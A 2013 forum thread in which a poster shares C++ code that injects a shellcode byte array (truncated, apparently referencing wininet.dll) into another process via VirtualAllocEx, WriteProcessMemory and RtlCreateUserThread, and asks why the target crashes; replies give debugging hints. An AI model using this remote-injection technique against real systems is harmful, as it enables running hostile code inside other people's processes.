RtlCreateUserThread best practices


capadleman
June 18th, 2013, 01:27
Hi guys
I have a shellcode, used VirtualAlloc with MEM_COMMIT and PAGE_EXECUTE_READWRITE, then RtlCreateUserThread.
The code is executed successfully but then the process crashes with a C000005 exception.

I read about DEP, but I already used PAGE_EXECUTE_READWRITE!
I also tried calling ExitThread.
How to avoid crashing the process?
Thanks
Here is the code
Code:
#include <windows.h>
#include <winternl.h>   // CLIENT_ID
#include <iostream>
using std::cin;

// ntdll (HMODULE) and the _RtlCreateUserThread function-pointer typedef are declared earlier (not shown in the post).
RtlCreateUserThread = (_RtlCreateUserThread)GetProcAddress(ntdll, "RtlCreateUserThread");
DWORD pid = 0;
cin >> pid;

HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
if (hProc == NULL)
    return -1;   // OpenProcess failed (GetLastError() has the reason)

// VirtualAllocEx returns LPVOID, not HANDLE. The request is 508 bytes but the buffer below
// is 509 bytes; the allocation is rounded up to a page, so the write still fits.
LPVOID code = VirtualAllocEx(hProc, NULL, 508, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (code == NULL)
    return -1;   // allocation in the target failed

const char hex[] = "\xe9\xff\x00\x00\x00\xe8\x1b\x01"
"\x00\x00\x77\x69\x6e\x69\x6e\x65"
"\x74\x2e\x64\x6c\x6c\x00\xe8\x1f"....
DWORD sizeofHex = 509;
if (!WriteProcessMemory(hProc, code, hex, sizeofHex, NULL))
    return -1;   // copy into the target failed

HANDLE hThd = NULL;
CLIENT_ID cid = {0};
__try {
    RtlCreateUserThread(hProc, NULL, FALSE, 0, 0, 0, code, 0, &hThd, &cid);
}
__except (EXCEPTION_EXECUTE_HANDLER) {   // original used GetExceptionCode() here, which is non-zero and so also runs the handler
    return -1;
}
WaitForSingleObject(hThd, INFINITE);

CloseHandle(hThd);
CloseHandle(hProc);

NeOXOeN
June 18th, 2013, 03:57
We are glad to help you with your question..


NeO

capadleman
June 18th, 2013, 04:01
Okay, I updated my question, Neo.

NeOXOeN
June 18th, 2013, 04:30
Any code, maybe, so people can have a look at what you did wrong? I will be just a little sarcastic.. I hope you will get the point of what I am saying..

I have a BOOK, it uses VirtualAlloc with MEM_COMMIT and PAGE_EXECUTE_READWRITE, then RtlCreateUserThread.
The code is executed successfully but then the process crashes with a C000005 exception.

I read about DEP, but I already used PAGE_EXECUTE_READWRITE!
I also tried calling ExitThread.
How to avoid crashing the process?... hmm, maybe doing it right ;O


I am not trying to be mean, I am just trying to help...

bye NeO

capadleman
June 18th, 2013, 05:42
No problem, I'm at work now,
so I need to get home to post the code.

Indy
August 6th, 2013, 15:09
RtlCreateUserThread() - bad API. Use kernel32, because Win32 (not native). It makes no sense to mix..

_genuine
August 23rd, 2013, 11:49
There's still a lot of missing information here, so let me probe a bit.
First you should know that DEP is also a mechanism that can be enforced at the hardware level, trying to execute a shellcode on the stack regardless of whether you're using VirtualAlloc or not.
Also I didn't get a chance to see exactly what the shellcode is doing, but have you suspended the target process before trying to execute the shellcode? I can see issues with the current code you're using that may cause some undefined behavior, namely at the point at which the shellcode is trying to be executed via the remote thread.
Where is the shellcode being injected? Also try adding a check to see if the call to VirtualAllocEx even succeeded; it would be a shame if it didn't, right?